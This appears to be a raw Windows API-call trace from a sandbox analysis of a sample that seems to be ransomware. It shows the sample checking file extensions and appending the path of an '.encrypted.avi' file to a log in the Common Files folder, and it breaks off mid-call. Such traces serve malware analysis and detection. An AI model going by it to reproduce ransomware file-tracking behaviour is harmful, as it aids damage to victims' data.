[0029.720] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0029.720] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.721] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0029.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0029.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0029.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0029.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0029.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0029.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0029.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0029.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0029.721] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0029.721] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0029.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0029.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0029.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0029.721] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.721] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.721] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.721] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".avi", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0029.721] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0029.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0029.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0029.721] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0029.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0029.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0029.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0029.721] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0029.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0029.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0029.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0029.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0029.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0029.722] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0029.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0029.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0029.722] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0029.722] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0029.722] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0029.722] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0029.722] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0029.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0029.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x89ffb8 [0029.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0029.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0029.722] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0029.722] ReadFile (in: hFile=0x128, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6aee3c*=0x114, lpOverlapped=0x0) returned 1 [0029.723] ReadFile (in: hFile=0x128, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0029.723] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x114, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0029.723] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0029.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0029.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x89ffb8 | out: hHeap=0x770000) returned 1 [0029.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0029.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0029.723] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aEGTPtS7bD.encrypted.avi\r\n", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0029.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x41) returned 0x88e138 [0029.723] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aEGTPtS7bD.encrypted.avi\r\n", cchWideChar=65, lpMultiByteStr=0x88e138, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aEGTPtS7bD.encrypted.avi\r\n", lpUsedDefaultChar=0x0) returned 65 [0029.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0029.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f36e0 [0029.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e138 | out: hHeap=0x770000) returned 1 [0029.723] WriteFile (in: hFile=0x128, lpBuffer=0x7f36e0*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7f36e0*, lpNumberOfBytesWritten=0x6aee3c*=0x40, lpOverlapped=0x0) returned 1 [0029.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0029.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0029.723] CloseHandle (hObject=0x128) returned 1 [0029.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0029.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0029.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ffb0 | out: hHeap=0x770000) returned 1 [0029.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0029.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0029.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0029.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0029.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0029.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0029.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0029.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0029.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0029.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0029.724] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0029.724] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0029.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0029.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0029.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0029.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0029.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0029.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0029.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0029.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0029.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0029.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0029.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0029.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0029.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0029.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0029.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0029.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0029.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0029.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0029.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0029.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0029.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0029.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0029.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0029.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0029.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0029.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0029.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0029.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0029.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0029.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0029.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0029.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0029.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0029.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0029.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0029.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0029.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0029.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0029.725] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0029.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0029.726] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0029.726] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0029.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0029.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0029.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0029.726] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0029.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0029.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0029.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0029.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af558 [0029.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0029.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0029.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0029.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0029.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0029.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0029.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0029.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889778 [0029.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0029.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0029.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0029.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0029.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0029.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0029.726] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0029.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0029.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0029.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0029.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0029.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0029.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0029.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0029.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0029.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0029.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0029.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0029.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0029.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0029.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0029.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0029.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0029.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0029.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0029.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0029.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0029.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0029.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0029.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0029.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0029.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0029.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0029.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0029.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0029.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0029.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0029.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0029.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0029.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0029.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0029.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0029.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0029.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0029.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0029.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0029.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0029.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0029.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0029.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0029.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0029.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0029.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0029.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0029.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0029.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0029.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0029.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0029.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0029.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0029.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0029.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0029.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0029.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0029.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0029.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0029.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0029.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0029.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0029.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0029.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0029.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0029.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0029.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0029.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0029.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0029.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0029.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0029.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0029.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0029.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0029.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0029.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0029.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0029.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0029.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0029.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0029.729] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0029.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0029.729] RtlAllocateHeap 